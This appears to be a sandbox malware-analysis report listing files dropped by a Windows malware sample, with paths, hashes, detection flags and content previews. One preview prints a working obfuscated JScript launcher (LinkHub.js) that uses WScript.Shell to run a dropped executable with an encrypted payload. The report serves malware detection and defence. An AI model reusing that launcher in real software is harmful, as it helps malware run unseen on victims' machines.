Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"c78b1bfe0ce270fc8f34f342fb30193a","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736227388000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"a91eb098201fbed6b453a90c0c7d26b0","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736227388000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"174464579519d9ecc88c0bb99496a3a6","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736227388000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"6efbd8a1dddf9ce91e9e31777a258958","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736227388000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"4c6451733568508003c8476074c1ce2c","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736227388000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"158f1dcdb8c60e7d73a007d1fb64ed55","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.1882034146907623
Encrypted:	false
SSDEEP:	48:TGufl2GL7msEHUUUUUUUU9SvR9H9vxFGiDIAEkGVvpa:lNVmswUUUUUUUU9+FGSItG
MD5:	35FB06EE78425479746C6D80CACFEE97
SHA1:	067CD15E1CCD538112844D973A045BDC8F5695B5
SHA-256:	B6415D4967BDC90C23B0637AA27FACFAF27DF32B8E3D961AC625A0CBC931A3A3
SHA-512:	31863CEC928147A111C83E11EEBE9427A79DE76AD0FBEB017CB14C25D525B858DA7033AB6A76D73BC8EB0781907097DBB12697B916BBFB0562126181844FD06B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.6071723825083042
Encrypted:	false
SSDEEP:	48:7MoZKUUUUUUUUUUFvR9H9vxFGiDIAEkGVvwpqFl2GL7ms2:7YUUUUUUUUUUhFGSItKpKVms2
MD5:	314C07B3F093A353AD71608FB85B622B
SHA1:	8E3D1CDB0C75B2A3DCA4961A6909C787F08590CD
SHA-256:	AA568375D7EC73BFA611B3FC8313E12C283918587125E30B460779042EFDE7FF
SHA-512:	7C814482318BFB542EB776F3DB370FAB35B04F960B3EC63E3F393E0591431A2089AA03ED743A279464641810BBB653E18E79E20A372FB4FBFAE50E1D6330CB71
Malicious:	false
Preview:	.... .c.......I.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgudueZKsrCUtQS8pFKWnP3bqXBQkdIYyu:6a6TZ44ADEudbZKsrCbbp13bw2K
MD5:	16E0F9975CC52D5CA32BB8E426FA0448
SHA1:	6FF1ED77E90F4EA37BD33613AE3208C6AD23B1FF
SHA-256:	A71ABC70D08B9E1EA0D717AB4DC7393582D795F3AC518A6C2F1FF84765EA7580
SHA-512:	39FE3330F0300DAF63990F2269ED2BF195B1A49ADC38931DF855C94D8F8185A4D2C515EE62AC93329B7FD99B16B83E2983154B8E24F652A4A9CF4BB89A699E70
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: installer_1.05_36.8.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: DansMinistrie.exe, Detection: malicious, Browse Filename: installer_1.05_36.7.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: 'Set-up.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: 9W9jJCj9EV.bat, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.7615351185197845
Encrypted:	false
SSDEEP:	6:RiOnJHonwWDKaJkDHLFkNx5AW9GfwWDKaJkDHLFkNx57:YIQjWaiF+/dG7WaiF+/7
MD5:	9DD76500C74BBB507074A3DA164E755D
SHA1:	72EBC79800AD7A96DCC8923A186D7ECA36561F28
SHA-256:	6801E9D84DF9CAAB43718B737D58E5E3CD3CB614DBAFEB50776630FCD8E6694C
SHA-512:	531E901749A8C5687310E8330A8558384A94C28587AC8B6B3EE362449F2C46B9F27BBF3C162095A030D880E6693E477F62FAB7A2C24F7D89FED0AC0E09A8C494
Malicious:	true
Preview:	new ActiveXObject("W"+"script.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\LinkHub.com\" \"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\y\"")

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	data
Category:	dropped
Size (bytes):	702975
Entropy (8bit):	7.9996899596807305
Encrypted:	true
SSDEEP:	12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
MD5:	40320097845035E71C88A2796F2F751B
SHA1:	C6002D6BEC7322277FE88154FDE0829C8A8E2762
SHA-256:	62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
SHA-512:	57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
Malicious:	false
Preview:	....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h\|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.........,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...\|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{\|.8.L.o;,.V...vC...B.p.X(T%..q..T..z..........M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[..I...?.v.tfJ..9....+..J.....g.....g.WK.....\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: installer_1.05_36.8.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: DansMinistrie.exe, Detection: malicious, Browse Filename: installer_1.05_36.7.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: 'Set-up.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: 9W9jJCj9EV.bat, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\U

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	702975
Entropy (8bit):	7.9996899596807305
Encrypted:	true
SSDEEP:	12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
MD5:	40320097845035E71C88A2796F2F751B
SHA1:	C6002D6BEC7322277FE88154FDE0829C8A8E2762
SHA-256:	62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
SHA-512:	57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
Malicious:	false
Preview:	....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h\|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.........,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...\|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{\|.8.L.o;,.V...vC...B.p.X(T%..q..T..z..........M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[..I...?.v.tfJ..9....+..J.....g.....g.WK.....\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Approaches

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	Microsoft Cabinet archive data, 488285 bytes, 11 files, at 0x2c +A "Instantly" +A "Dressing", ID 8829, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488285
Entropy (8bit):	7.998550946105718
Encrypted:	true
SSDEEP:	12288:GtaS7z1F+D7f32HLxjQ8IeOFg8CAINNtUcfgBTG12Zqc:+aS7zqDcLxk8Ie5ZNN6cQqwZqc
MD5:	7A07DED0E02828AA5F3CFBAD5642C558
SHA1:	166EAD6F90D79790E559C7CB19BC2588E6EDBAE1
SHA-256:	2089D963BDAD621F966AC18E371FBF4BDD2E94CFA1841142EDF317E4B971F28B
SHA-512:	9DA78695AC581646ADBA790FBBFEE3E2E26DA4F60C75FCABCF11D30E06054D59C6E3A764B4828EEBC6592E7FE5255BF1778AE1A8877D60E1A45C971B9D2586D6
Malicious:	false
Preview:	MSCF....]s......,...............}"..<........`........'Z.% .Instantly......`....'Z.% .Dressing......x....'Z.% .Measurement..$...\|....'Z.% .Indonesia..@.......'Z.% .Led...........'Z.% .Different...........'Z.% .Missed...........'Z.% .Clinton..\|........'Z.% .Brian..........'Z.% .Protocol..4..]@....'Z.% .Constitute...b..K..CK...\|...0>..,.Y1.......ltA.K$.l.H.....[..>.....'[..n...Zk...>..m..Uw...~..Jb..E..DX>.l d.s..n....y...~.s?.=..{.=..s........[.Fwm.g..\OR..q.l'..>.G...\|..r.s9..p...>..[.B.\....e.99"..ub...x......i(.r.........S2.)..3.8.xXl........o#..YE.(...%...7Z.N.....\|.F.f..l..H.b...KI..1..mm.3.B.V....x.V..{..f..p.Z....V[%.T.....r......^.S@w.#..r...lQ.&b?P..Y.]MN~(.b.Ja........-..1..T.m...\v...v...>.......0...a.K.X.X..ib.I..#q.....K....."...).4...d..F.,....62>.X.e.7....7..i..[.(....[.5..m..Y#"....."~.9xz..S.....j..i.][7NU...2k..__...\|uL.....M..Y..rP..7.....F..Q......B$.O...ZO.]n.U..n..z..;Jj..H...Q...G/K..+c.MEj.l..j....Jl..[l..\|.~.....f..>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Beam

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.997420919125293
Encrypted:	true
SSDEEP:	1536:mPM2IWHYOOcbdpzCNBSD2XTn32zuIcRgk64wnWEi8o:mP5THh5b3+n32zo64Ao
MD5:	18E13DD846278DD017E9BDD8322ACF0E
SHA1:	431DDC2AF8197F887CF7E9B5346792FDBF0F07E3
SHA-256:	4784DDD355896DE73BCCCDB7D0AFD69D6376ADE1F3A22B18BFDA58EB4DFB0744
SHA-512:	005CBE957E2FE900299A82168D0CEB4FF9A89FE82B407103A7DA34BED1C0F12CF22850080D2EB22FAD5A0BAC7813696103BAFCA6735FB31223BEFFF0697CCE2F
Malicious:	false
Preview:	.w..+..h}...X.M....N..h.y.......>...e......pD..{..S....u....8...!.9.....Q.G..rB...d.._..q.~...}8.../.CW.E.`.......c.}..x...M..H..,Mk...N..K......G.>..F.Ru....-....9.Y...q...3$.iN.!.\|.g...n...k..W.i..g..J.L.....P.....F'{6}.i.<,a}..i.....]"......y.yi.+..C..-^j....T.6..j.5..f..&..DN4.$B.i.&..#..K..d......."...."U...r...Qm..V....6....e.....X.vw...I..B<ei....}.>l._,......H.kq.5...........{.QT.Z'.dF[...fkMH$V%....K....y.M..b.G....lv.....>.q..n...-..D7;F~...Ix..AL.5.}......0..9X..w.I...o..\...a.<..a&<...t(.iz.?.N...mx.o...O.b.}5G.~.c.#.....==...O..RY......o..]...G?=.<.;...N.^.E.2.3....=...XC.6..XC.)H<......4.?>\...Ng...C.vHLv<..A..u.p-qs.G)z.8\|.s.<V.._..6.`.^..#.^..._o...4..^h....!"&I...>....b...'.=I(.'e..!..Z..R1;..3A..F/.Jwr.GcX*GO?.t...f^1G...cF..@.iC.U.8.#..$..p......e2....U..j.c....q..V.rL....xf...F..X85.5.L#K.T.s..a.c`......z_.Y..9E.6......>...x2...=.d..`...^.U.p~..n.U.#........S.BY..n/........]..M....1...J8..%.:..l..s.8...\....J...D.y.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Blocked

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	7.9982174281872025
Encrypted:	true
SSDEEP:	3072:tYj0CGgXe/2IS6hnqS2WONlLUDBt7itJs6g:tYVG4ehSOnMWONlY9t7itJQ
MD5:	99A9AA7C4197C9FA2B465011F162397E
SHA1:	F4501935D473209F9D6312E03E71B65271D709E4
SHA-256:	6196D79DC188E3581F8446637CF77E8E9105000E7A8A8135213F750D9BC65EB0
SHA-512:	03EF41FC61EC810C788252EEDCDC7C2616A55C2CF0996F830DAB1A60982589360CAD7C71B76A199A94DE0337BD068AC1A7A6503CE67CC091BAF1C6C6758B01F5
Malicious:	false
Preview:	4t....d+.R..f[.V....3@.....L?/.'.D.."........I..6..q..AC..CK.W.xjt[.:.....m>..PWV.l......BQ.H.x.xw..,?..S..$.. .. y..........do....R.a..Hn...N.x..I.R.j.1.D..`..L.D.`x4.....`v.. .q...D.b......J.{.6\|..m.......k.!.7.4.Z%.............(...O/.'".A.H..{r(.Z.$.......-......ZXo.ts.r.......i..~Y.w.l..aS....lv.DI?g{'Z..J.Sq.s.......>OB..-.#k.t...M.Y@~x. .C0.h...C.6O...5.K2!0.Z..+.@F.T...{k.U...S....u.n]...M.7S.....[..;.D..o.....t...H.&.c.2.7...%...".&].2....@......Q...YZ.d.P...r\.;...e......b(.....Xc.8...h....k....O..p.i.@$..q..k8....3...:....&@)x.....j....c.k.x.$9,.0..".....v......Q.d..?cW..&mmw.g..U`.....R7..P..^..1.f.Mb......?...^....6.v..P...K...j.`f.I.?..lJ6.F...q..{.}..C......@.L.w....k.Au....@V.x..{l,.%)....>...i.y.b.....5.G[....n....i.G...a.....".A...h.!6+../....P.....L...>".Y.0....q.39.P..!bj...da.#e......-.U....h...mh.+..V.}....<./....F.dw...,.l......j5...B<..30.,...W.m#].F.O..FLP.d..:.....L..~F0e..j.zq..)p(h...R...}p.B

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Brian

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	5.234350627932401
Encrypted:	false
SSDEEP:	768:Jx/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:JdKaj6iTcPAsAhxjgarB
MD5:	031B6C0EDF7E1DD8ACF9700CC96085D7
SHA1:	0819EC14EBC323A9507E52A0579F6F9BA1589C3D
SHA-256:	7FA45FC5F2F9C52E289D56F5AF6B95427EDC979A838608DC20CB4D89C7078553
SHA-512:	75577FEEB70AF3025A021FB8DD3FC52B56AC9EC7CE7B0BB24E2970CA3626A0B96984ADB7874AE5608C9A739BC46E5C2207C98B2CB0C40925B2D95B7A2969A7BA
Malicious:	false
Preview:	?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.r.r.r.r.r.r.r.r.r.r.r.C.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Clinton

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	4.910075425726921
Encrypted:	false
SSDEEP:	768:FOWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+3:F5el3EYrDWyu0uZo2+3
MD5:	2BC25537976C2E146EBED51446CE7B59
SHA1:	0EBD76401729D4F1B9B4DCAB1586D96CD410A1D2
SHA-256:	F01BA73C4332997F031434DDA3EBBFE03EE70F9BE65275ABEEDE452E148B94E7
SHA-512:	7BA4AEA3D8836216CDFB4B27EC7AF041BF9EDB5A0DEA8BEECE8C7950BC9BC793B12F7E7C1A0B4EA6E0194A1211CACBFB06204E68689E0DA3E895BE8518572A80
Malicious:	false
Preview:	................................................................................PST.............................................................PDT............................................................. .L.`.L.....................................`.y.!...............................@~............. ...............................@.............. ...............................A.................[.........................@~......Q...Q.^. ._.j.2.........................1~........................................................................................................ .............................................................................................................................................................................................................abcdefghijklmnopqrstuvwxyz......ABCDEFGHIJKLMNOPQRSTUVWXYZ.............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cocks

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.997164994069138
Encrypted:	true
SSDEEP:	1536:bdM1aIyizRac/AX9Cslc7g63p8ueagJNvZoNoWRY6Du/FI84:ZVIyQ/o91658ueaa2PS/FIj
MD5:	990ABD973C6DDB75837EEB5B21F59AE1
SHA1:	85846C0CE7CD3314DEC32E3BED99511A59B6500A
SHA-256:	29B9FA04343B577FFB55491F820A6D1978230072AE4752AD42836CF0581CD5E2
SHA-512:	179561473340EB92A5BCAFE243217D9C8158572239294DDF45CB0FBDEF0EBAE1B07863C631CE7BFB983F65F627268300812EB38AAABCBA3CFF90F5D014C06754
Malicious:	false
Preview:	.Zhz.&..N.......B.z..si.....u...4A[.F.A.$...O..Y....]..3&M.p%.?.>Z..O.q..$X...KuS.a.C.....(J..#.f...k.c...0..o0.L..,..2k.Lc.x."........0...X...Q..Ix...Ep...yw..1...V.~........h\pK3m ........(h..\|.gp....@..:.O.K.....(...v..s.{.{..wz..].fh..j.8}}..F95..T...pX.............)j?.....%.Q"....{.#}..,dz......]d%..... .K..z#..{C.B......Z.....j{.u;..Yhl...[...T.80.y<dc.2IHG..8......1..x.....pF.%. ....f5>.CT7.}.."....<...4E.k.m.......o.....\G.y.WK[\|.."}...E...../.$.......d.\|..X.-^.d.F"..".W..(..<.........HQ............M!c......?Z32.>.$.._.yR...\.-.=O.p.x...y.z.E...._.a/6..Q...3...QG..P.kQ2...FU.!$.)..ve.......N...B..j.{..`...Q.t ..;.\.J!O F.3..o1U....*.4gJ.U.N....x.I 9C3..V....Z.../..u.",.J.q..Q'l.o...h ....V>m...d..._.d...V..-.H..H..Pw....M...b.-9...cgV.b..._...D.a....x.V....y^..Yaq...#......-"q....0v7.dB....T.!.........d,.)u.....Y...P^.p....]sX.(."..A.ky1..SFK..G..G^.p..#.8c.q.....~....{.d..b......l..o...Q......l..G.g.t9}....Q....`...KX.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Constitute

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	144384
Entropy (8bit):	6.494296209067955
Encrypted:	false
SSDEEP:	3072:5dgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQw:LgQaE/loUDtf0accB3gBmmLsiS+w
MD5:	57BB8B206C43DDE57D7066A4DEDB272C
SHA1:	E3B400206A6D3C7C5885CB56BFCAB82220BB110A
SHA-256:	821735E47ECA9D213B65D12878DCA3D3EC620B5FE0555F0BD3B73EEE459A6D4F
SHA-512:	C5E0C68E27CFC9705178C261FC617EAC27D745CDF93F88D01A49D3025AD7025038FB8DB5FA36D96089D4410BB965E9163282A99A0D6EAE40ED6783AF6C5BD074
Malicious:	false
Preview:	..F...................E....;E...MN..;...EN.........H......T...$.PA........x...........U...E.....M...E.....;E...NK..;...FK.........[.......v.......[..h.........O.......W....O...............................O...7...........%....v..0...Hj....~.............F..F.@....#O........3.F...............Q.w....N.....E...M....Q.6P.s....M...............G..X........[............S........S............S........R.......w....R........R.......d............v..........R...7...........F............_^3.[..]........BN.......W...<N...........=.....................2.....F........H..........$.xA....c.......Z...;...\|....N......u........P..................S.......A..$..A......V.......1....7........u...S...l....q...........h....$..A....N...V...]....M...H..........$..A.....f...s..].....f...C.j..v..6.p..0.j.......................................+..M......+....M..E....u....;...AJ..;...9J...}....T......Vf...v....Lf...C.j..v..6.p..0........'........Q......F..........Q......F.........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\David

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	7.996610067500435
Encrypted:	true
SSDEEP:	1536:Uq7NUVrVpkmRwRjr3psvmpMfmPO6rpciGjMzjM:UKNUVrkRRGm1PO6mj4M
MD5:	583A66DF71B30CE556F3F5131162AA1C
SHA1:	0594EF5DF9510410B520282D9C833D604969865A
SHA-256:	83A055C80F22D870C163A6ABC49664C8A9F8D14CB9CDB11DFBCB70AD72191D4C
SHA-512:	3939472BA5061896D4F8E0F1F97ED34B52D32F5D27DA41FC5C92EF73653482102349AF607F327B15B13FD208C970B95DBB3B714332FF1D58CFDFF25C0C1C4C3A
Malicious:	false
